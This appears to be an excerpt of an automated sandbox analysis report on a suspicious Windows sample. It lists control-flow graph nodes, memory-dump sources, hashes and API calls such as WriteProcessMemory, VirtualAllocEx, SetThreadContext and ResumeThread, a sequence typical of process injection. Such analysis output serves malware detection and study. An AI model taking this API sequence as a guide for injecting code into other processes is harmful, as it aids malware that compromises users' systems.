                                                                                control_flow_graph 1078 6980b98-6980ba4 1079 6980baa-6980c5a SendMessageW 1078->1079 1080 6980ba6-6980ba9 1078->1080 1086 6980c5c-6980c62 1079->1086 1087 6980c63-6980c77 1079->1087 1086->1087
                                                                                APIs
                                                                                • SendMessageW.USER32(?,?,?,?), ref: 06980C4D
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.448009727.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_6980000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 43741976f4d780c4e72c761402481200d87e13532c7e1843b36c012549cf1041
                                                                                • Instruction ID: 0c2ae3ca049559bea22a892d063ccafe49f72ef9cf97a34a92c5bfd525f70daf
                                                                                • Opcode Fuzzy Hash: 43741976f4d780c4e72c761402481200d87e13532c7e1843b36c012549cf1041
                                                                                • Instruction Fuzzy Hash: DE2177B1A042489FCB10DFA9D884ADEBFF8EB49324F14846AE449A7751C734A944CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1089 c692e0-c692f8 1091 c692cf 1089->1091 1092 c692fa-c69318 1089->1092 1093 c69b18-c69b58 1091->1093 1092->1093 1095 c69b60-c69b8f LoadLibraryExW 1093->1095 1096 c69b5a-c69b5d 1093->1096 1097 c69b91-c69b97 1095->1097 1098 c69b98-c69bb5 1095->1098 1096->1095 1097->1098
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C69971,00000800,00000000,00000000), ref: 00C69B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: acc597bd5379cd0df813744952f1bf066329c6dc18a9dcf3a7ff74f1b6eb8331
                                                                                • Instruction ID: fd6688ff0ad07bb694aa65d60ef0e0f07b56117bbc0059565ede36d4faf5d95e
                                                                                • Opcode Fuzzy Hash: acc597bd5379cd0df813744952f1bf066329c6dc18a9dcf3a7ff74f1b6eb8331
                                                                                • Instruction Fuzzy Hash: F8219AB18043988FDB20CF9AC484ADEBBF8EF89310F01845ED465A7211C334A909DFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1101 89288c0-8928916 1103 8928926-8928965 WriteProcessMemory 1101->1103 1104 8928918-8928924 1101->1104 1106 8928967-892896d 1103->1106 1107 892896e-892899e 1103->1107 1104->1103 1106->1107
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08928958
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 6dc85effee17d9d5d2c309ef2dece9dc48cad75defe6a936e6d94c12d85aae7f
                                                                                • Instruction ID: 8cf93be92d3a4d0d7f0b51638722acfed433b7fb9498dae5c571ce9577bb0f53
                                                                                • Opcode Fuzzy Hash: 6dc85effee17d9d5d2c309ef2dece9dc48cad75defe6a936e6d94c12d85aae7f
                                                                                • Instruction Fuzzy Hash: CD212275900299CFCB00DFA9C984BEEBBF5FF48314F14842AE958A7244D7789944DFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1111 89288c8-8928916 1113 8928926-8928965 WriteProcessMemory 1111->1113 1114 8928918-8928924 1111->1114 1116 8928967-892896d 1113->1116 1117 892896e-892899e 1113->1117 1114->1113 1116->1117
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08928958
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 0090eae6521deb7ce5108ef9414a03627b36e3a7660b6ab4f09938a4e5c1f778
                                                                                • Instruction ID: 6eb76d857b2eb61c901c743fe8ff1c665f4df8ff852f2bc4dab8035ff305adbb
                                                                                • Opcode Fuzzy Hash: 0090eae6521deb7ce5108ef9414a03627b36e3a7660b6ab4f09938a4e5c1f778
                                                                                • Instruction Fuzzy Hash: 56212FB5900359DFCB00CFA9C980BEEBBF5FB48314F10842AE958A7244D778A944DBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1121 c69650-c6b96c DuplicateHandle 1123 c6b975-c6b992 1121->1123 1124 c6b96e-c6b974 1121->1124 1124->1123
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C6B89E,?,?,?,?,?), ref: 00C6B95F
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 9114c1b1bdede4e31690557debc838e7302d8d7f95f69273fdee4b2b80ce93dc
                                                                                • Instruction ID: 5b50a97a2a6c26cde0f211fe07962e754e73e894d289a11092546c0cd4545464
                                                                                • Opcode Fuzzy Hash: 9114c1b1bdede4e31690557debc838e7302d8d7f95f69273fdee4b2b80ce93dc
                                                                                • Instruction Fuzzy Hash: BC21E4B5900258EFDB10CFA9D984ADEBBF8EB48324F14801AE954B3310D374A954DFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1127 c6b8d3-c6b96c DuplicateHandle 1128 c6b975-c6b992 1127->1128 1129 c6b96e-c6b974 1127->1129 1129->1128
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C6B89E,?,?,?,?,?), ref: 00C6B95F
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 6c49318e5e44c0b889b207949a54d0995fd06fdf4243d7bb8eaec0cbb3ec8dfd
                                                                                • Instruction ID: 2ef32addb765458fd79f8a2e3d0127595a72186bdab9c1c00a15ccdd5f5cf10a
                                                                                • Opcode Fuzzy Hash: 6c49318e5e44c0b889b207949a54d0995fd06fdf4243d7bb8eaec0cbb3ec8dfd
                                                                                • Instruction Fuzzy Hash: 1821E4B5901259AFDB10CFA9D984ADEBBF4FB48320F14801AE954B3310D378A945DFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1132 89284a0-89284eb 1134 89284fb-892852b SetThreadContext 1132->1134 1135 89284ed-89284f9 1132->1135 1137 8928534-8928564 1134->1137 1138 892852d-8928533 1134->1138 1135->1134 1138->1137
                                                                                APIs
                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 0892851E
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThread
                                                                                • String ID:
                                                                                • API String ID: 1591575202-0
                                                                                • Opcode ID: d63b5dd891aeb7c029fe60d228ed1c84274f72a0cc77b9b46d21b3e2983d128b
                                                                                • Instruction ID: f2d717f9583dc0117426266e83007c8a17d7fcff354079e357ee33a5b1cb4d87
                                                                                • Opcode Fuzzy Hash: d63b5dd891aeb7c029fe60d228ed1c84274f72a0cc77b9b46d21b3e2983d128b
                                                                                • Instruction Fuzzy Hash: 182138719003588FCB10DFAAC484BEEBBF4EF48218F14842ED559B7244DB789944CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08928761
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 3944a3a79f3f8f90595bf726c57852846b8c8666a8111494f610739192aca192
                                                                                • Instruction ID: acf8bf6c4a9f6cee4e3f89ef75e27ef41c452cc9abb74153f4c354b35299968d
                                                                                • Opcode Fuzzy Hash: 3944a3a79f3f8f90595bf726c57852846b8c8666a8111494f610739192aca192
                                                                                • Instruction Fuzzy Hash: 1421F571D003599FCB00DFA9C984AEEBBF5FF48314F54842AE958A3250D7789944DFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08928A7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 8ac8994e9e6c934db9c65f074396f581ac59f052bf08e0a296cc40850bc901fb
                                                                                • Instruction ID: e060a842eaadb2c37ce336718647176fcc81918d19abf9aab8cdb3091103df2a
                                                                                • Opcode Fuzzy Hash: 8ac8994e9e6c934db9c65f074396f581ac59f052bf08e0a296cc40850bc901fb
                                                                                • Instruction Fuzzy Hash: AB1167718003888BCF10CFA9C844ADFBBF5EF48324F148819E519B7250C774A944DFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C69971,00000800,00000000,00000000), ref: 00C69B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: ce16b517dce2592ff373fe5a947aecc0c9cd0fb4473385424fe806e81a02d385
                                                                                • Instruction ID: ff2dc96add23e114ff8099cd39d36d8a19aba0c502bd6b967ed2d2907eb301f7
                                                                                • Opcode Fuzzy Hash: ce16b517dce2592ff373fe5a947aecc0c9cd0fb4473385424fe806e81a02d385
                                                                                • Instruction Fuzzy Hash: 6F1117B59003488FDB20CF9AD484BDEFBF8EB88314F15841AD415B7200C374A945CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08928A7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: a21c99d249670d8a0daf6472f837c84a58a11c08a88dbcfa082b35ca80f477a3
                                                                                • Instruction ID: 8484fbf84d07e3419b8bf59595fafbec3109a6857471e855c60c678b6e2f1ecb
                                                                                • Opcode Fuzzy Hash: a21c99d249670d8a0daf6472f837c84a58a11c08a88dbcfa082b35ca80f477a3
                                                                                • Instruction Fuzzy Hash: 2F1126719002499BCF10DFA9C844ADEBBF5EF48324F148419E519B7250CB759944DFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C69971,00000800,00000000,00000000), ref: 00C69B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 5df38b7974d854d8c3bcabcea6a8414f5965c3e8dcf04bf9e21b46410ce55c07
                                                                                • Instruction ID: 717e1ec7c3fde25b7550c652cf48b712f84b885f3799882953b0f3aa520b00b9
                                                                                • Opcode Fuzzy Hash: 5df38b7974d854d8c3bcabcea6a8414f5965c3e8dcf04bf9e21b46410ce55c07
                                                                                • Instruction Fuzzy Hash: 2C1114B6D002498FDB20CF9AD484ADEFBF9EB88314F14841AD419B7200C774A949CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 8059f3a00b791ffd00172d8e6db4298b4619228981f9e17789c5d5de984768eb
                                                                                • Instruction ID: 5ac60c4fab454cf883e8b6c6b1c2968e6d16640a65e1112b56676c94aebeb798
                                                                                • Opcode Fuzzy Hash: 8059f3a00b791ffd00172d8e6db4298b4619228981f9e17789c5d5de984768eb
                                                                                • Instruction Fuzzy Hash: CD1158719003588BCB10DFAAC4447DEFBF4AB88224F148429C519B7640C734A948CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00C698F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: a571ceedc88f7e63cff4aa245e275acf4dbfd0d906a16b0bc82a24893865c795
                                                                                • Instruction ID: 5c5373b4353fcca39e6db65f6ecd9d48920d2e53b0a33da558456b91addc39ce
                                                                                • Opcode Fuzzy Hash: a571ceedc88f7e63cff4aa245e275acf4dbfd0d906a16b0bc82a24893865c795
                                                                                • Instruction Fuzzy Hash: 211104B1D006498FDB10CF9AD4847DEFBF4EB49324F14851AD429B7200D374A645CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00C6FF28,?,?,?,?), ref: 00C6FF9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID:
                                                                                • API String ID: 1378638983-0
                                                                                • Opcode ID: c14b37b7976c348924cbdca604555b9b86f68ec7ceae6380cb34fdbc0dc824b5
                                                                                • Instruction ID: cfa1f6124a4b311f56208fbbd660a2e03cb22d3a2b5a2bbac42234d6a3899be2
                                                                                • Opcode Fuzzy Hash: c14b37b7976c348924cbdca604555b9b86f68ec7ceae6380cb34fdbc0dc824b5
                                                                                • Instruction Fuzzy Hash: 911106B59002489FDB10CF99D585BDEFBF4EB48324F20841AE859A7340D378A945CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00C698F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 611aa4b55a0c6da12af4953cd38779107bd3fed6bff7eaabea25e9f92126b535
                                                                                • Instruction ID: 4491240a14dfde079844fc30235e5669a45515e7c28168784462bcbeb5a04ac3
                                                                                • Opcode Fuzzy Hash: 611aa4b55a0c6da12af4953cd38779107bd3fed6bff7eaabea25e9f92126b535
                                                                                • Instruction Fuzzy Hash: 5F1102B1D002498FCB20CF9AC484ADEFBF8EB89324F14841AD429B7200C374A545CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00C6FF28,?,?,?,?), ref: 00C6FF9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID:
                                                                                • API String ID: 1378638983-0
                                                                                • Opcode ID: ca6d75f09800996f16395a33a635b3240a3c8fc9f8930e420c2494a0f675ff5d
                                                                                • Instruction ID: 4dccbc2c19fd0aa26e7b5ef9111561ca0393eb1ff6b4f7e74f0dad75ea5240c2
                                                                                • Opcode Fuzzy Hash: ca6d75f09800996f16395a33a635b3240a3c8fc9f8930e420c2494a0f675ff5d
                                                                                • Instruction Fuzzy Hash: C011F2B59002489FDB20CF9AD985BDEBBF8EB49324F10841AE955B7340C374A944CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08928A7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: ac060058174c4cf55b4482c710cc78596f06ba2749d94c723358f6388dbc2731
                                                                                • Instruction ID: ab5adb065570d52206eda4b7cf32bac9249ec8e74d9b81730d8219cff17d8ec6
                                                                                • Opcode Fuzzy Hash: ac060058174c4cf55b4482c710cc78596f06ba2749d94c723358f6388dbc2731
                                                                                • Instruction Fuzzy Hash: 95F0C2319083908FCB11DBACC4443DEBFF19F41219F29849AC155E7256C7394549DBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429761380.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c0d000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 81de3cfe6d4352dbcb1d17de4e3f6e05ee36728839f1bebcde051e0f8f171bcb
                                                                                • Instruction ID: 84c00d91d25c501d55d2f35c7da08a2df8b57c03a8b158242e2522bbc339cc98
                                                                                • Opcode Fuzzy Hash: 81de3cfe6d4352dbcb1d17de4e3f6e05ee36728839f1bebcde051e0f8f171bcb
                                                                                • Instruction Fuzzy Hash: 062137F1504244DFDB01CF94DDC0B2ABF65FB88328F248669ED064B286C336D946DBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429790666.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c1d000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a677cbc085fc8b4f80aa506ce7bb14474279517e3adeccb4edaf8ee6d6fbdfd4
                                                                                • Instruction ID: c690eecce8b5193e8260603310d7f30493fc2550d17830fd0e213d3bf1b65eb0
                                                                                • Opcode Fuzzy Hash: a677cbc085fc8b4f80aa506ce7bb14474279517e3adeccb4edaf8ee6d6fbdfd4
                                                                                • Instruction Fuzzy Hash: 6D2137B1504244EFDB01CF10D5C0B6ABBA1FB85314F24C6A9E81A4B246C336DC86EB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429790666.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c1d000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 764eeaca3aaa0127c34cfa533a7577cf0653303258ea9f7acc159457caf26b1e
                                                                                • Instruction ID: e09ed229c328847990bc27ddfd31289af6e084c6bf81487b8922bae463169e9a
                                                                                • Opcode Fuzzy Hash: 764eeaca3aaa0127c34cfa533a7577cf0653303258ea9f7acc159457caf26b1e
                                                                                • Instruction Fuzzy Hash: 3C2137B5504244DFCB14CF14D8C0B56BB61FB89314F24C5A9E80A4B246C33AD887EB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429790666.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c1d000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c8a3a40864cd3c80860ac39ffb4a043e3a387ea083055c85770bd47565efd3b0
                                                                                • Instruction ID: b137bde04dc7e93d3406102c954f32fb2efa7ca6c32e34fd4cebffd6d6429eb0
                                                                                • Opcode Fuzzy Hash: c8a3a40864cd3c80860ac39ffb4a043e3a387ea083055c85770bd47565efd3b0
                                                                                • Instruction Fuzzy Hash: 722192755093C08FCB02CF24D990755BF71EB46314F28C5EAD8498B697C33A984ADB62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429761380.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c0d000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
                                                                                • Instruction ID: d8737d1f6d6afcf162036403a0488056c03040250be6df93882f8be36810d4a1
                                                                                • Opcode Fuzzy Hash: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
                                                                                • Instruction Fuzzy Hash: EF11D3B6904280CFCB11CF54D9C4B16BF71FB94324F24C6A9DC060B656C33AD95ACBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429790666.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c1d000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9d35afff73f64a3ce4a9ad24b32e567c7a1d94a238c24113185269c1f0cd325c
                                                                                • Instruction ID: c89e331d881c40cc6dd2add7020f162f336cb481ea4d90966d36a3ddc04b3644
                                                                                • Opcode Fuzzy Hash: 9d35afff73f64a3ce4a9ad24b32e567c7a1d94a238c24113185269c1f0cd325c
                                                                                • Instruction Fuzzy Hash: 6D11DD75904280DFCB01CF10D5C0B55FBB1FB85324F28C6ADD85A4B656C33AD89ADB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:4.4%
                                                                                Dynamic/Decrypted Code Coverage:93.6%
                                                                                Signature Coverage:9.9%
                                                                                Total number of Nodes:1462
                                                                                Total number of Limit Nodes:43
                                                                                execution_graph 35743 c78e46 35746 c78e4f 35743->35746 35745 c78e85 35746->35745 35747 c78e66 Sleep 35746->35747 35749 c71d0a 35746->35749 35748 c78e7b 35747->35748 35748->35745 35748->35746 35750 c71dbd 35749->35750 35760 c71d1c 35749->35760 35774 c760b8 6 API calls __decode_pointer 35750->35774 35752 c71dc3 35775 c73df7 68 API calls __getptd_noexit 35752->35775 35757 c71d79 RtlAllocateHeap 35757->35760 35758 c71d2d 35758->35760 35767 c76070 68 API calls 2 library calls 35758->35767 35768 c75ec5 68 API calls 7 library calls 35758->35768 35769 c75c11 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 35758->35769 35760->35757 35760->35758 35761 c71da9 35760->35761 35764 c71dae 35760->35764 35766 c71db5 35760->35766 35770 c71cbb 68 API calls 4 library calls 35760->35770 35771 c760b8 6 API calls __decode_pointer 35760->35771 35772 c73df7 68 API calls __getptd_noexit 35761->35772 35773 c73df7 68 API calls __getptd_noexit 35764->35773 35766->35746 35767->35758 35768->35758 35770->35760 35771->35760 35772->35764 35773->35766 35774->35752 35775->35766 35776 c76f85 35779 c76f13 TlsGetValue 35776->35779 35780 c76f4c GetModuleHandleW 35779->35780 35781 c76f2b 35779->35781 35783 c76f67 GetProcAddress 35780->35783 35784 c76f5c 35780->35784 35781->35780 35782 c76f35 TlsGetValue 35781->35782 35787 c76f40 35782->35787 35786 c76f44 35783->35786 35791 c75b8d Sleep GetModuleHandleW 35784->35791 35789 c76f77 RtlEncodePointer 35786->35789 35790 c76f7f 35786->35790 35787->35780 35787->35786 35788 c76f62 35788->35783 35788->35790 35789->35790 35791->35788 35792 40a0c4 35793 40a0e8 __EH_prolog3 35792->35793 35850 409f80 35793->35850 35795 40a163 ctype 35796 40a1e1 35795->35796 35797 40a217 35795->35797 35867 403a16 35796->35867 35798 40c689 77 API calls 35797->35798 35800 40a208 ctype 35798->35800 35854 40d6b9 35800->35854 35802 40a2ed ctype 35803 40a342 35802->35803 35804 40a324 35802->35804 35874 40410f 77 API calls numpunct 35803->35874 35806 40c689 77 API calls 35804->35806 35807 40a338 ctype 35806->35807 35808 40a3b4 35807->35808 35809 40a3ce 35807->35809 35811 40c689 77 API calls 35808->35811 35810 403a16 numpunct 77 API calls 35809->35810 35812 40a3c4 ctype 35810->35812 35811->35812 35860 40c689 35812->35860 35814 40a460 ctype 35815 40a4a2 35814->35815 35816 40a484 35814->35816 35818 403a16 numpunct 77 API calls 35815->35818 35817 40c689 77 API calls 35816->35817 35819 40a498 ctype 35817->35819 35818->35819 35820 40a558 35819->35820 35821 40a538 35819->35821 35823 403a16 numpunct 77 API calls 